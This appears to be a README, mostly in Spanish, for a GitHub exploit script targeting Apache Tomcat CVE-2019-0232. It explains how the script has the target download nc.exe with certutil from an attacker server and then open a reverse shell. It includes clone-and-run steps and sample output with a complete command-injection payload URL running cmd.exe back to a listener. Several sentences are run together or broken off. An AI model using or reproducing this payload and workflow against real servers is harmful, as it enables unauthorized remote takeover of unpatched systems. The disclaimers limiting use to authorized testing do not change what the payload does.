
Hola, este es un código revisado y mejorado para CVE-2019-0232
Este script explota la vulnerabilidad CVE-2019-0232 en Apache Tomcat, que permite la ejecución remota de código mediante el manejo inadecuado del script ism.bat. El script emplea una técnica de reverse shell utilizando certutil y nc.exe (Netcat) para obtener acceso remoto al sistema vulnerable.
ism.bat, que podría permitir a los atacantes ejecutar comandos arbitrarios en el servidor. Esta vulnerabilidad se produce debido a la falta de validación adecuada de la entrada del usuario, lo que permite a los atacantes provocar la ejecución de comandos arbitrarios mediante una solicitud especialmente diseñada.nc.exe malicioso de un servidor remoto y utilizarlo para generar una reverse shell.nc.exe) debe estar alojado en un servidor para la conexión de reverse shell.nc.exe: El script envía una solicitud especialmente diseñada al servidor Tomcat vulnerable para descargar el archivo nc.exe (Netcat) en la máquina objetivo mediante certutil.nc.exe, se envía otra solicitud para ejecutar el comando de reverse shell, que se conecta de vuelta al listener de Netcat del atacante.git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
Una vez ejecutado con éxito, debería tener una conexión de reverse shell de vuelta a su listener de Netcat.
Este script está destinado únicamente a fines educativos. No lo utilice para actividades maliciosas. Obtenga siempre la autorización adecuada antes de intentar cualquier prueba de penetración o auditoría de seguridad. El uso indebido de este script podría conllevar consecuencias legales.
Asegúrese de que el servidor Apache Tomcat no esté parcheado contra CVE-2019-0232 antes de usar este exploit. El script puede requerir privilegios administrativos dependiendo de la configuración del sistema objetivo.
Autor: A!Z3N(Dharan) ¡Hecho con poder!
Este proyecto está licenciado bajo la Licencia MIT.
Sin embargo, úselo bajo su propio riesgo. Este código se proporciona únicamente con fines educativos. Al usar este código, acepta asumir toda la responsabilidad por cualquier acción resultante de su uso. El uso indebido o no autorizado de este exploit puede conllevar consecuencias legales. Obtenga siempre la autorización adecuada antes de realizar cualquier prueba de seguridad o prueba de penetración en cualquier sistema.
Es libre de usar, modificar y distribuir este código, pero solo con fines éticos. El autor no es responsable de ningún daño causado por este código.
No utilice este exploit sin el permiso explícito del propietario del sistema objetivo.